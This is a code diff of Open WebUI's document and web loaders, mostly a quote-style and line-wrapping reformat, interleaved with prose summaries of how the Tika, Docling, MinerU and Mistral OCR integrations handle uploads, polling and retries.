+            raise Exception(f'Error connecting to endpoint: {e}')

        if response.ok:
-
            response_data = response.json()
            if response_data:
                if isinstance(response_data, dict):
                    return [
                        Document(
-                            page_content=response_data.get("page_content"),
-                            metadata=response_data.get("metadata"),
+                            page_content=response_data.get('page_content'),
+                            metadata=response_data.get('metadata'),
                        )
                    ]
                elif isinstance(response_data, list):
                    documents = []
                    for document in response_data:
                        documents.append(
                            Document(
-                                page_content=document.get("page_content"),
-                                metadata=document.get("metadata"),
+                                page_content=document.get('page_content'),
+                                metadata=document.get('metadata'),
                            )
                        )
                    return documents
                else:
-                    raise Exception("Error loading document: Unable to parse content")
+                    raise Exception('Error loading document: Unable to parse content')
            else:
-                raise Exception("Error loading document: No content returned")
+                raise Exception('Error loading document: No content returned')
        else:
-            raise Exception(
-                f"Error loading document: {response.status_code} {response.text}"
-            )
+            raise Exception(f'Error loading document: {response.status_code} {response.text}')
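ExternalDocumentLoader defines a small contract for external extraction services: it PUTs the raw file bytes to <url>/process with Content-Type, an optional Bearer Authorization header, and a URL-quoted X-Filename header, and expects JSON back as either a single {"page_content", "metadata"} object or a list of them. A minimal compatible endpoint might look like the sketch below (not Open WebUI code; FastAPI is just one way to satisfy the contract, and the plain-text decoding stands in for real parsing):

    from fastapi import FastAPI, Request

    app = FastAPI()

    @app.put('/process')
    async def process(request: Request):
        data = await request.body()  # raw file bytes sent by the loader
        filename = request.headers.get('x-filename', 'upload')
        # A real service would dispatch on Content-Type; this sketch just decodes.
        text = data.decode('utf-8', errors='replace')
        return {'page_content': text, 'metadata': {'source': filename}}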
backend/open_webui/retrieval/loaders/external_web.py  +6 −6  modified

@@ -30,22 +30,22 @@ def lazy_load(self) -> Iterator[Document]:
            response = requests.post(
                self.external_url,
                headers={
-                    "User-Agent": "Open WebUI (https://github.com/open-webui/open-webui) External Web Loader",
-                    "Authorization": f"Bearer {self.external_api_key}",
+                    'User-Agent': 'Open WebUI (https://github.com/open-webui/open-webui) External Web Loader',
+                    'Authorization': f'Bearer {self.external_api_key}',
                },
                json={
-                    "urls": urls,
+                    'urls': urls,
                },
            )
            response.raise_for_status()
            results = response.json()
            for result in results:
                yield Document(
-                    page_content=result.get("page_content", ""),
-                    metadata=result.get("metadata", {}),
+                    page_content=result.get('page_content', ''),
+                    metadata=result.get('metadata', {}),
                )
        except Exception as e:
            if self.continue_on_failure:
-                log.error(f"Error extracting content from batch {urls}: {e}")
+                log.error(f'Error extracting content from batch {urls}: {e}')
            else:
                raise e
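The web loader speaks a similar batch contract: it POSTs {"urls": [...]} with a Bearer token and expects a JSON list of {"page_content", "metadata"} objects, one per fetched page; with continue_on_failure set, a failed batch is logged and skipped rather than aborting the generator. Hypothetical usage, with constructor arguments inferred from the fields the excerpt reads (the real signature may differ):

    loader = ExternalWebLoader(
        urls=['https://example.com/a', 'https://example.com/b'],
        external_url='https://scraper.internal/extract',  # illustrative endpoint
        external_api_key='sk-...',
        continue_on_failure=True,
    )
    for doc in loader.lazy_load():
        print(doc.metadata, len(doc.page_content))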
backend/open_webui/retrieval/loaders/main.py+199 −212 modified@@ -30,59 +30,59 @@ log = logging.getLogger(__name__) known_source_ext = [ - "go", - "py", - "java", - "sh", - "bat", - "ps1", - "cmd", - "js", - "ts", - "css", - "cpp", - "hpp", - "h", - "c", - "cs", - "sql", - "log", - "ini", - "pl", - "pm", - "r", - "dart", - "dockerfile", - "env", - "php", - "hs", - "hsc", - "lua", - "nginxconf", - "conf", - "m", - "mm", - "plsql", - "perl", - "rb", - "rs", - "db2", - "scala", - "bash", - "swift", - "vue", - "svelte", - "ex", - "exs", - "erl", - "tsx", - "jsx", - "hs", - "lhs", - "json", - "yaml", - "yml", - "toml", + 'go', + 'py', + 'java', + 'sh', + 'bat', + 'ps1', + 'cmd', + 'js', + 'ts', + 'css', + 'cpp', + 'hpp', + 'h', + 'c', + 'cs', + 'sql', + 'log', + 'ini', + 'pl', + 'pm', + 'r', + 'dart', + 'dockerfile', + 'env', + 'php', + 'hs', + 'hsc', + 'lua', + 'nginxconf', + 'conf', + 'm', + 'mm', + 'plsql', + 'perl', + 'rb', + 'rs', + 'db2', + 'scala', + 'bash', + 'swift', + 'vue', + 'svelte', + 'ex', + 'exs', + 'erl', + 'tsx', + 'jsx', + 'hs', + 'lhs', + 'json', + 'yaml', + 'yml', + 'toml', ] @@ -99,11 +99,11 @@ def load(self) -> list[Document]: xls = pd.ExcelFile(self.file_path) for sheet_name in xls.sheet_names: df = pd.read_excel(xls, sheet_name=sheet_name) - text_parts.append(f"Sheet: {sheet_name}\n{df.to_string(index=False)}") + text_parts.append(f'Sheet: {sheet_name}\n{df.to_string(index=False)}') return [ Document( - page_content="\n\n".join(text_parts), - metadata={"source": self.file_path}, + page_content='\n\n'.join(text_parts), + metadata={'source': self.file_path}, ) ] @@ -125,11 +125,11 @@ def load(self) -> list[Document]: if shape.has_text_frame: slide_texts.append(shape.text_frame.text) if slide_texts: - text_parts.append(f"Slide {i}:\n" + "\n".join(slide_texts)) + text_parts.append(f'Slide {i}:\n' + '\n'.join(slide_texts)) return [ Document( - page_content="\n\n".join(text_parts), - metadata={"source": self.file_path}, + page_content='\n\n'.join(text_parts), + metadata={'source': self.file_path}, ) ] @@ -143,241 +143,225 @@ def __init__(self, url, file_path, mime_type=None, extract_images=None): self.extract_images = extract_images def load(self) -> list[Document]: - with open(self.file_path, "rb") as f: + with open(self.file_path, 'rb') as f: data = f.read() if self.mime_type is not None: - headers = {"Content-Type": self.mime_type} + headers = {'Content-Type': self.mime_type} else: headers = {} if self.extract_images == True: - headers["X-Tika-PDFextractInlineImages"] = "true" + headers['X-Tika-PDFextractInlineImages'] = 'true' endpoint = self.url - if not endpoint.endswith("/"): - endpoint += "/" - endpoint += "tika/text" + if not endpoint.endswith('/'): + endpoint += '/' + endpoint += 'tika/text' r = requests.put(endpoint, data=data, headers=headers, verify=REQUESTS_VERIFY) if r.ok: raw_metadata = r.json() - text = raw_metadata.get("X-TIKA:content", "<No text content found>").strip() + text = raw_metadata.get('X-TIKA:content', '<No text content found>').strip() - if "Content-Type" in raw_metadata: - headers["Content-Type"] = raw_metadata["Content-Type"] + if 'Content-Type' in raw_metadata: + headers['Content-Type'] = raw_metadata['Content-Type'] - log.debug("Tika extracted text: %s", text) + log.debug('Tika extracted text: %s', text) return [Document(page_content=text, metadata=headers)] else: - raise Exception(f"Error calling Tika: {r.reason}") + raise Exception(f'Error calling Tika: {r.reason}') class DoclingLoader: def __init__(self, url, api_key=None, file_path=None, 
mime_type=None, params=None): - self.url = url.rstrip("/") + self.url = url.rstrip('/') self.api_key = api_key self.file_path = file_path self.mime_type = mime_type self.params = params or {} def load(self) -> list[Document]: - with open(self.file_path, "rb") as f: + with open(self.file_path, 'rb') as f: headers = {} if self.api_key: - headers["X-Api-Key"] = f"{self.api_key}" + headers['X-Api-Key'] = f'{self.api_key}' r = requests.post( - f"{self.url}/v1/convert/file", + f'{self.url}/v1/convert/file', files={ - "files": ( + 'files': ( self.file_path, f, - self.mime_type or "application/octet-stream", + self.mime_type or 'application/octet-stream', ) }, data={ - "image_export_mode": "placeholder", + 'image_export_mode': 'placeholder', **self.params, }, headers=headers, ) if r.ok: result = r.json() - document_data = result.get("document", {}) - text = document_data.get("md_content", "<No text content found>") + document_data = result.get('document', {}) + text = document_data.get('md_content', '<No text content found>') - metadata = {"Content-Type": self.mime_type} if self.mime_type else {} + metadata = {'Content-Type': self.mime_type} if self.mime_type else {} - log.debug("Docling extracted text: %s", text) + log.debug('Docling extracted text: %s', text) return [Document(page_content=text, metadata=metadata)] else: - error_msg = f"Error calling Docling API: {r.reason}" + error_msg = f'Error calling Docling API: {r.reason}' if r.text: try: error_data = r.json() - if "detail" in error_data: - error_msg += f" - {error_data['detail']}" + if 'detail' in error_data: + error_msg += f' - {error_data["detail"]}' except Exception: - error_msg += f" - {r.text}" - raise Exception(f"Error calling Docling: {error_msg}") + error_msg += f' - {r.text}' + raise Exception(f'Error calling Docling: {error_msg}') class Loader: - def __init__(self, engine: str = "", **kwargs): + def __init__(self, engine: str = '', **kwargs): self.engine = engine - self.user = kwargs.get("user", None) + self.user = kwargs.get('user', None) self.kwargs = kwargs - def load( - self, filename: str, file_content_type: str, file_path: str - ) -> list[Document]: + def load(self, filename: str, file_content_type: str, file_path: str) -> list[Document]: loader = self._get_loader(filename, file_content_type, file_path) docs = loader.load() - return [ - Document( - page_content=ftfy.fix_text(doc.page_content), metadata=doc.metadata - ) - for doc in docs - ] + return [Document(page_content=ftfy.fix_text(doc.page_content), metadata=doc.metadata) for doc in docs] def _is_text_file(self, file_ext: str, file_content_type: str) -> bool: return file_ext in known_source_ext or ( file_content_type - and file_content_type.find("text/") >= 0 + and file_content_type.find('text/') >= 0 # Avoid text/html files being detected as text - and not file_content_type.find("html") >= 0 + and not file_content_type.find('html') >= 0 ) def _get_loader(self, filename: str, file_content_type: str, file_path: str): - file_ext = filename.split(".")[-1].lower() + file_ext = filename.split('.')[-1].lower() if ( - self.engine == "external" - and self.kwargs.get("EXTERNAL_DOCUMENT_LOADER_URL") - and self.kwargs.get("EXTERNAL_DOCUMENT_LOADER_API_KEY") + self.engine == 'external' + and self.kwargs.get('EXTERNAL_DOCUMENT_LOADER_URL') + and self.kwargs.get('EXTERNAL_DOCUMENT_LOADER_API_KEY') ): loader = ExternalDocumentLoader( file_path=file_path, - url=self.kwargs.get("EXTERNAL_DOCUMENT_LOADER_URL"), - api_key=self.kwargs.get("EXTERNAL_DOCUMENT_LOADER_API_KEY"), + 
url=self.kwargs.get('EXTERNAL_DOCUMENT_LOADER_URL'), + api_key=self.kwargs.get('EXTERNAL_DOCUMENT_LOADER_API_KEY'), mime_type=file_content_type, user=self.user, ) - elif self.engine == "tika" and self.kwargs.get("TIKA_SERVER_URL"): + elif self.engine == 'tika' and self.kwargs.get('TIKA_SERVER_URL'): if self._is_text_file(file_ext, file_content_type): loader = TextLoader(file_path, autodetect_encoding=True) else: loader = TikaLoader( - url=self.kwargs.get("TIKA_SERVER_URL"), + url=self.kwargs.get('TIKA_SERVER_URL'), file_path=file_path, - extract_images=self.kwargs.get("PDF_EXTRACT_IMAGES"), + extract_images=self.kwargs.get('PDF_EXTRACT_IMAGES'), ) elif ( - self.engine == "datalab_marker" - and self.kwargs.get("DATALAB_MARKER_API_KEY") + self.engine == 'datalab_marker' + and self.kwargs.get('DATALAB_MARKER_API_KEY') and file_ext in [ - "pdf", - "xls", - "xlsx", - "ods", - "doc", - "docx", - "odt", - "ppt", - "pptx", - "odp", - "html", - "epub", - "png", - "jpeg", - "jpg", - "webp", - "gif", - "tiff", + 'pdf', + 'xls', + 'xlsx', + 'ods', + 'doc', + 'docx', + 'odt', + 'ppt', + 'pptx', + 'odp', + 'html', + 'epub', + 'png', + 'jpeg', + 'jpg', + 'webp', + 'gif', + 'tiff', ] ): - api_base_url = self.kwargs.get("DATALAB_MARKER_API_BASE_URL", "") - if not api_base_url or api_base_url.strip() == "": - api_base_url = "https://www.datalab.to/api/v1/marker" # https://github.com/open-webui/open-webui/pull/16867#issuecomment-3218424349 + api_base_url = self.kwargs.get('DATALAB_MARKER_API_BASE_URL', '') + if not api_base_url or api_base_url.strip() == '': + api_base_url = 'https://www.datalab.to/api/v1/marker' # https://github.com/open-webui/open-webui/pull/16867#issuecomment-3218424349 loader = DatalabMarkerLoader( file_path=file_path, - api_key=self.kwargs["DATALAB_MARKER_API_KEY"], + api_key=self.kwargs['DATALAB_MARKER_API_KEY'], api_base_url=api_base_url, - additional_config=self.kwargs.get("DATALAB_MARKER_ADDITIONAL_CONFIG"), - use_llm=self.kwargs.get("DATALAB_MARKER_USE_LLM", False), - skip_cache=self.kwargs.get("DATALAB_MARKER_SKIP_CACHE", False), - force_ocr=self.kwargs.get("DATALAB_MARKER_FORCE_OCR", False), - paginate=self.kwargs.get("DATALAB_MARKER_PAGINATE", False), - strip_existing_ocr=self.kwargs.get( - "DATALAB_MARKER_STRIP_EXISTING_OCR", False - ), - disable_image_extraction=self.kwargs.get( - "DATALAB_MARKER_DISABLE_IMAGE_EXTRACTION", False - ), - format_lines=self.kwargs.get("DATALAB_MARKER_FORMAT_LINES", False), - output_format=self.kwargs.get( - "DATALAB_MARKER_OUTPUT_FORMAT", "markdown" - ), + additional_config=self.kwargs.get('DATALAB_MARKER_ADDITIONAL_CONFIG'), + use_llm=self.kwargs.get('DATALAB_MARKER_USE_LLM', False), + skip_cache=self.kwargs.get('DATALAB_MARKER_SKIP_CACHE', False), + force_ocr=self.kwargs.get('DATALAB_MARKER_FORCE_OCR', False), + paginate=self.kwargs.get('DATALAB_MARKER_PAGINATE', False), + strip_existing_ocr=self.kwargs.get('DATALAB_MARKER_STRIP_EXISTING_OCR', False), + disable_image_extraction=self.kwargs.get('DATALAB_MARKER_DISABLE_IMAGE_EXTRACTION', False), + format_lines=self.kwargs.get('DATALAB_MARKER_FORMAT_LINES', False), + output_format=self.kwargs.get('DATALAB_MARKER_OUTPUT_FORMAT', 'markdown'), ) - elif self.engine == "docling" and self.kwargs.get("DOCLING_SERVER_URL"): + elif self.engine == 'docling' and self.kwargs.get('DOCLING_SERVER_URL'): if self._is_text_file(file_ext, file_content_type): loader = TextLoader(file_path, autodetect_encoding=True) else: # Build params for DoclingLoader - params = self.kwargs.get("DOCLING_PARAMS", {}) + params = 
The remaining hunks in this file's _get_loader routine normalize string literals from double to single quotes and re-wrap long calls; behavior is unchanged. The engine branches survive intact: Docling (DOCLING_PARAMS parsed as JSON, logging "Invalid DOCLING_PARAMS format, expected JSON object" and falling back to an empty dict on bad input), Azure Document Intelligence for pdf/docx/ppt/pptx (key-based auth, or DefaultAzureCredential when DOCUMENT_INTELLIGENCE_KEY is empty), MinerU (PDF only, with MINERU_API_TIMEOUT coerced to int, default 300), and Mistral OCR (PDF only, requiring a non-empty MISTRAL_OCR_API_KEY).
The extension/content-type fallback chain is likewise preserved: PyPDFLoader for PDF (honoring PDF_EXTRACT_IMAGES and PDF_LOADER_MODE), CSVLoader with autodetect_encoding, UnstructuredRSTLoader and UnstructuredXMLLoader with a logged warning and a TextLoader fallback when the optional 'unstructured' package is missing, BSHTMLLoader for htm/html, TextLoader for Markdown, UnstructuredEPubLoader (a hard ValueError without 'unstructured'), Docx2txtLoader for DOCX, UnstructuredExcelLoader with an ExcelLoader (pandas) fallback, UnstructuredPowerPointLoader with a PptxLoader fallback, OutlookMessageLoader for .msg, UnstructuredODTLoader (hard ValueError without 'unstructured'), and TextLoader with autodetect_encoding=True as the final default.
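The degrade-gracefully pattern these hunks preserve (try the optional dependency's loader, log a warning, fall back to plain text) reads, schematically, like the sketch below. It mirrors the diff's RST branch; only the wrapper function name is invented:

    import logging

    from langchain_community.document_loaders import TextLoader

    log = logging.getLogger(__name__)


    def pick_rst_loader(file_path: str):
        # Prefer the optional 'unstructured' RST loader; degrade to plain text.
        try:
            from langchain_community.document_loaders import UnstructuredRSTLoader

            return UnstructuredRSTLoader(file_path, mode='elements')
        except ImportError:
            log.warning(
                "The 'unstructured' package is not installed. "
                'Falling back to plain text loading for .rst file.'
            )
            return TextLoader(file_path, autodetect_encoding=True)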
backend/open_webui/retrieval/loaders/mineru.py +117 −135 modified
The MinerULoader diff is the same mechanical reformatting (quote style, line wrapping, collapsed multi-line calls); no logic changes. The loader still validates api_mode as 'local' or 'cloud' (an API key is mandatory in cloud mode) and routes load() accordingly. The local path POSTs the file to {api_url}/file_parse with return_md='true', maps failures to HTTPExceptions (404 for a missing file, 504 on timeout, 400 for HTTP errors, 502 for unparseable JSON), and returns the first result's md_content as a single Document with backend/version metadata. The cloud path requests a presigned upload URL from {api_url}/file-urls/batch, PUTs the file to it, polls {api_url}/extract-results/batch/{batch_id} every 2 seconds for up to 300 iterations (about 10 minutes) until the file's state is 'done' or 'failed' (intermediate states: 'waiting-file', 'pending', 'running', 'converting'), then downloads the result ZIP and extracts the first non-empty .md file as the document content, with detailed errors when no markdown is found.
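The cloud path's polling loop reduces to a bounded poll over the batch state. A minimal sketch of that control flow, with a stand-in fetch_state callable in place of the authenticated GET:

    import time
    from typing import Callable


    def poll_until_done(fetch_state: Callable[[], str],
                        poll_interval: float = 2.0,
                        max_iterations: int = 300) -> None:
        # ~10 minutes at 2-second intervals, as in _poll_batch_status
        for iteration in range(max_iterations):
            state = fetch_state()  # e.g. GET /extract-results/batch/{batch_id}
            if state == 'done':
                return
            if state == 'failed':
                raise RuntimeError('MinerU processing failed')
            # 'waiting-file', 'pending', 'running', 'converting': keep waiting
            if iteration % 10 == 0:  # log roughly every 20 seconds
                print(f'state={state} ({iteration + 1}/{max_iterations})')
            time.sleep(poll_interval)
        raise TimeoutError('MinerU processing timed out after 10 minutes')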
backend/open_webui/retrieval/loaders/mistral.py +139 −191 modified
The MistralLoader hunks are also quote and wrapping changes. The constructor still rejects an empty API key and a missing file, defaults base_url to https://api.mistral.ai/v1, and keeps the differentiated timeouts: uploads capped at min(timeout, 120) seconds, signed-URL requests at 30 seconds, OCR at the full timeout, and cleanup at 30 seconds, with an 'OpenWebUI-MistralLoader/2.0' User-Agent on every request. Response handling (sync and async) and the retry predicate are unchanged: only network timeouts, connection errors, HTTP 5xx, and 429 count as retryable, and both retry helpers wait min((2**attempt) + 0.5, 30) seconds between attempts.
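That schedule is a conventional capped exponential backoff. A minimal sketch (the max_retries default here is illustrative, the final-attempt handling is simplified, and the real helpers also retry HTTP 5xx/429 responses):

    import time


    def retry_with_backoff(request_func, max_retries: int = 3):
        for attempt in range(max_retries):
            try:
                return request_func()
            except (TimeoutError, ConnectionError):
                if attempt == max_retries - 1:
                    raise  # out of attempts; surface the last error
                # 1.5s, 2.5s, 4.5s, ... capped at 30s between attempts
                wait_time = min((2 ** attempt) + 0.5, 30)
                time.sleep(wait_time)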
""" - log.info("Uploading file to Mistral API") - url = f"{self.base_url}/files" + log.info('Uploading file to Mistral API') + url = f'{self.base_url}/files' def upload_request(): # MEMORY OPTIMIZATION: Use context manager to minimize file handle lifetime # This ensures the file is closed immediately after reading, reducing memory usage - with open(self.file_path, "rb") as f: - files = {"file": (self.file_name, f, "application/pdf")} - data = {"purpose": "ocr"} + with open(self.file_path, 'rb') as f: + files = {'file': (self.file_name, f, 'application/pdf')} + data = {'purpose': 'ocr'} # NOTE: stream=False is required for this endpoint # The Mistral API doesn't support chunked uploads for this endpoint @@ -265,42 +247,38 @@ def upload_request(): try: response_data = self._retry_request_sync(upload_request) - file_id = response_data.get("id") + file_id = response_data.get('id') if not file_id: - raise ValueError("File ID not found in upload response.") - log.info(f"File uploaded successfully. File ID: {file_id}") + raise ValueError('File ID not found in upload response.') + log.info(f'File uploaded successfully. File ID: {file_id}') return file_id except Exception as e: - log.error(f"Failed to upload file: {e}") + log.error(f'Failed to upload file: {e}') raise async def _upload_file_async(self, session: aiohttp.ClientSession) -> str: """Async file upload with streaming for better memory efficiency.""" - url = f"{self.base_url}/files" + url = f'{self.base_url}/files' async def upload_request(): # Create multipart writer for streaming upload - writer = aiohttp.MultipartWriter("form-data") + writer = aiohttp.MultipartWriter('form-data') # Add purpose field - purpose_part = writer.append("ocr") - purpose_part.set_content_disposition("form-data", name="purpose") + purpose_part = writer.append('ocr') + purpose_part.set_content_disposition('form-data', name='purpose') # Add file part with streaming file_part = writer.append_payload( aiohttp.streams.FilePayload( self.file_path, filename=self.file_name, - content_type="application/pdf", + content_type='application/pdf', ) ) - file_part.set_content_disposition( - "form-data", name="file", filename=self.file_name - ) + file_part.set_content_disposition('form-data', name='file', filename=self.file_name) - self._debug_log( - f"Uploading file: {self.file_name} ({self.file_size:,} bytes)" - ) + self._debug_log(f'Uploading file: {self.file_name} ({self.file_size:,} bytes)') async with session.post( url, @@ -312,48 +290,44 @@ async def upload_request(): response_data = await self._retry_request_async(upload_request) - file_id = response_data.get("id") + file_id = response_data.get('id') if not file_id: - raise ValueError("File ID not found in upload response.") + raise ValueError('File ID not found in upload response.') - log.info(f"File uploaded successfully. File ID: {file_id}") + log.info(f'File uploaded successfully. 
File ID: {file_id}') return file_id def _get_signed_url(self, file_id: str) -> str: """Retrieves a temporary signed URL for the uploaded file (sync version).""" - log.info(f"Getting signed URL for file ID: {file_id}") - url = f"{self.base_url}/files/{file_id}/url" - params = {"expiry": 1} - signed_url_headers = {**self.headers, "Accept": "application/json"} + log.info(f'Getting signed URL for file ID: {file_id}') + url = f'{self.base_url}/files/{file_id}/url' + params = {'expiry': 1} + signed_url_headers = {**self.headers, 'Accept': 'application/json'} def url_request(): - response = requests.get( - url, headers=signed_url_headers, params=params, timeout=self.url_timeout - ) + response = requests.get(url, headers=signed_url_headers, params=params, timeout=self.url_timeout) return self._handle_response(response) try: response_data = self._retry_request_sync(url_request) - signed_url = response_data.get("url") + signed_url = response_data.get('url') if not signed_url: - raise ValueError("Signed URL not found in response.") - log.info("Signed URL received.") + raise ValueError('Signed URL not found in response.') + log.info('Signed URL received.') return signed_url except Exception as e: - log.error(f"Failed to get signed URL: {e}") + log.error(f'Failed to get signed URL: {e}') raise - async def _get_signed_url_async( - self, session: aiohttp.ClientSession, file_id: str - ) -> str: + async def _get_signed_url_async(self, session: aiohttp.ClientSession, file_id: str) -> str: """Async signed URL retrieval.""" - url = f"{self.base_url}/files/{file_id}/url" - params = {"expiry": 1} + url = f'{self.base_url}/files/{file_id}/url' + params = {'expiry': 1} - headers = {**self.headers, "Accept": "application/json"} + headers = {**self.headers, 'Accept': 'application/json'} async def url_request(): - self._debug_log(f"Getting signed URL for file ID: {file_id}") + self._debug_log(f'Getting signed URL for file ID: {file_id}') async with session.get( url, headers=headers, @@ -364,69 +338,65 @@ async def url_request(): response_data = await self._retry_request_async(url_request) - signed_url = response_data.get("url") + signed_url = response_data.get('url') if not signed_url: - raise ValueError("Signed URL not found in response.") + raise ValueError('Signed URL not found in response.') - self._debug_log("Signed URL received successfully") + self._debug_log('Signed URL received successfully') return signed_url def _process_ocr(self, signed_url: str) -> Dict[str, Any]: """Sends the signed URL to the OCR endpoint for processing (sync version).""" - log.info("Processing OCR via Mistral API") - url = f"{self.base_url}/ocr" + log.info('Processing OCR via Mistral API') + url = f'{self.base_url}/ocr' ocr_headers = { **self.headers, - "Content-Type": "application/json", - "Accept": "application/json", + 'Content-Type': 'application/json', + 'Accept': 'application/json', } payload = { - "model": "mistral-ocr-latest", - "document": { - "type": "document_url", - "document_url": signed_url, + 'model': 'mistral-ocr-latest', + 'document': { + 'type': 'document_url', + 'document_url': signed_url, }, - "include_image_base64": False, + 'include_image_base64': False, } def ocr_request(): - response = requests.post( - url, headers=ocr_headers, json=payload, timeout=self.ocr_timeout - ) + response = requests.post(url, headers=ocr_headers, json=payload, timeout=self.ocr_timeout) return self._handle_response(response) try: ocr_response = self._retry_request_sync(ocr_request) - log.info("OCR processing done.") - 
self._debug_log("OCR response: %s", ocr_response) + log.info('OCR processing done.') + self._debug_log('OCR response: %s', ocr_response) return ocr_response except Exception as e: - log.error(f"Failed during OCR processing: {e}") + log.error(f'Failed during OCR processing: {e}') raise - async def _process_ocr_async( - self, session: aiohttp.ClientSession, signed_url: str - ) -> Dict[str, Any]: + async def _process_ocr_async(self, session: aiohttp.ClientSession, signed_url: str) -> Dict[str, Any]: """Async OCR processing with timing metrics.""" - url = f"{self.base_url}/ocr" + url = f'{self.base_url}/ocr' headers = { **self.headers, - "Content-Type": "application/json", - "Accept": "application/json", + 'Content-Type': 'application/json', + 'Accept': 'application/json', } payload = { - "model": "mistral-ocr-latest", - "document": { - "type": "document_url", - "document_url": signed_url, + 'model': 'mistral-ocr-latest', + 'document': { + 'type': 'document_url', + 'document_url': signed_url, }, - "include_image_base64": False, + 'include_image_base64': False, } async def ocr_request(): - log.info("Starting OCR processing via Mistral API") + log.info('Starting OCR processing via Mistral API') start_time = time.time() async with session.post( @@ -438,50 +408,44 @@ async def ocr_request(): ocr_response = await self._handle_response_async(response) processing_time = time.time() - start_time - log.info(f"OCR processing completed in {processing_time:.2f}s") + log.info(f'OCR processing completed in {processing_time:.2f}s') return ocr_response return await self._retry_request_async(ocr_request) def _delete_file(self, file_id: str) -> None: """Deletes the file from Mistral storage (sync version).""" - log.info(f"Deleting uploaded file ID: {file_id}") - url = f"{self.base_url}/files/{file_id}" + log.info(f'Deleting uploaded file ID: {file_id}') + url = f'{self.base_url}/files/{file_id}' try: - response = requests.delete( - url, headers=self.headers, timeout=self.cleanup_timeout - ) + response = requests.delete(url, headers=self.headers, timeout=self.cleanup_timeout) delete_response = self._handle_response(response) - log.info(f"File deleted successfully: {delete_response}") + log.info(f'File deleted successfully: {delete_response}') except Exception as e: # Log error but don't necessarily halt execution if deletion fails - log.error(f"Failed to delete file ID {file_id}: {e}") + log.error(f'Failed to delete file ID {file_id}: {e}') - async def _delete_file_async( - self, session: aiohttp.ClientSession, file_id: str - ) -> None: + async def _delete_file_async(self, session: aiohttp.ClientSession, file_id: str) -> None: """Async file deletion with error tolerance.""" try: async def delete_request(): - self._debug_log(f"Deleting file ID: {file_id}") + self._debug_log(f'Deleting file ID: {file_id}') async with session.delete( - url=f"{self.base_url}/files/{file_id}", + url=f'{self.base_url}/files/{file_id}', headers=self.headers, - timeout=aiohttp.ClientTimeout( - total=self.cleanup_timeout - ), # Shorter timeout for cleanup + timeout=aiohttp.ClientTimeout(total=self.cleanup_timeout), # Shorter timeout for cleanup ) as response: return await self._handle_response_async(response) await self._retry_request_async(delete_request) - self._debug_log(f"File {file_id} deleted successfully") + self._debug_log(f'File {file_id} deleted successfully') except Exception as e: # Don't fail the entire process if cleanup fails - log.warning(f"Failed to delete file ID {file_id}: {e}") + log.warning(f'Failed to delete file ID 
{file_id}: {e}') @asynccontextmanager async def _get_session(self): @@ -506,21 +470,21 @@ async def _get_session(self): async with aiohttp.ClientSession( connector=connector, timeout=timeout, - headers={"User-Agent": "OpenWebUI-MistralLoader/2.0"}, + headers={'User-Agent': 'OpenWebUI-MistralLoader/2.0'}, raise_for_status=False, # We handle status codes manually trust_env=True, ) as session: yield session def _process_results(self, ocr_response: Dict[str, Any]) -> List[Document]: """Process OCR results into Document objects with enhanced metadata and memory efficiency.""" - pages_data = ocr_response.get("pages") + pages_data = ocr_response.get('pages') if not pages_data: - log.warning("No pages found in OCR response.") + log.warning('No pages found in OCR response.') return [ Document( - page_content="No text content found", - metadata={"error": "no_pages", "file_name": self.file_name}, + page_content='No text content found', + metadata={'error': 'no_pages', 'file_name': self.file_name}, ) ] @@ -530,8 +494,8 @@ def _process_results(self, ocr_response: Dict[str, Any]) -> List[Document]: # Process pages in a memory-efficient way for page_data in pages_data: - page_content = page_data.get("markdown") - page_index = page_data.get("index") # API uses 0-based index + page_content = page_data.get('markdown') + page_index = page_data.get('index') # API uses 0-based index if page_content is None or page_index is None: skipped_pages += 1 @@ -548,42 +512,38 @@ def _process_results(self, ocr_response: Dict[str, Any]) -> List[Document]: if not cleaned_content: skipped_pages += 1 - self._debug_log(f"Skipping empty page {page_index}") + self._debug_log(f'Skipping empty page {page_index}') continue # Create document with optimized metadata documents.append( Document( page_content=cleaned_content, metadata={ - "page": page_index, # 0-based index from API - "page_label": page_index + 1, # 1-based label for convenience - "total_pages": total_pages, - "file_name": self.file_name, - "file_size": self.file_size, - "processing_engine": "mistral-ocr", - "content_length": len(cleaned_content), + 'page': page_index, # 0-based index from API + 'page_label': page_index + 1, # 1-based label for convenience + 'total_pages': total_pages, + 'file_name': self.file_name, + 'file_size': self.file_size, + 'processing_engine': 'mistral-ocr', + 'content_length': len(cleaned_content), }, ) ) if skipped_pages > 0: - log.info( - f"Processed {len(documents)} pages, skipped {skipped_pages} empty/invalid pages" - ) + log.info(f'Processed {len(documents)} pages, skipped {skipped_pages} empty/invalid pages') if not documents: # Case where pages existed but none had valid markdown/index - log.warning( - "OCR response contained pages, but none had valid content/index." 
- ) + log.warning('OCR response contained pages, but none had valid content/index.') return [ Document( - page_content="No valid text content found in document", + page_content='No valid text content found in document', metadata={ - "error": "no_valid_pages", - "total_pages": total_pages, - "file_name": self.file_name, + 'error': 'no_valid_pages', + 'total_pages': total_pages, + 'file_name': self.file_name, }, ) ] @@ -615,24 +575,20 @@ def load(self) -> List[Document]: documents = self._process_results(ocr_response) total_time = time.time() - start_time - log.info( - f"Sync OCR workflow completed in {total_time:.2f}s, produced {len(documents)} documents" - ) + log.info(f'Sync OCR workflow completed in {total_time:.2f}s, produced {len(documents)} documents') return documents except Exception as e: total_time = time.time() - start_time - log.error( - f"An error occurred during the loading process after {total_time:.2f}s: {e}" - ) + log.error(f'An error occurred during the loading process after {total_time:.2f}s: {e}') # Return an error document on failure return [ Document( - page_content=f"Error during processing: {e}", + page_content=f'Error during processing: {e}', metadata={ - "error": "processing_failed", - "file_name": self.file_name, + 'error': 'processing_failed', + 'file_name': self.file_name, }, ) ] @@ -643,9 +599,7 @@ def load(self) -> List[Document]: self._delete_file(file_id) except Exception as del_e: # Log deletion error, but don't overwrite original error if one occurred - log.error( - f"Cleanup error: Could not delete file ID {file_id}. Reason: {del_e}" - ) + log.error(f'Cleanup error: Could not delete file ID {file_id}. Reason: {del_e}') async def load_async(self) -> List[Document]: """ @@ -672,21 +626,19 @@ async def load_async(self) -> List[Document]: documents = self._process_results(ocr_response) total_time = time.time() - start_time - log.info( - f"Async OCR workflow completed in {total_time:.2f}s, produced {len(documents)} documents" - ) + log.info(f'Async OCR workflow completed in {total_time:.2f}s, produced {len(documents)} documents') return documents except Exception as e: total_time = time.time() - start_time - log.error(f"Async OCR workflow failed after {total_time:.2f}s: {e}") + log.error(f'Async OCR workflow failed after {total_time:.2f}s: {e}') return [ Document( - page_content=f"Error during OCR processing: {e}", + page_content=f'Error during OCR processing: {e}', metadata={ - "error": "processing_failed", - "file_name": self.file_name, + 'error': 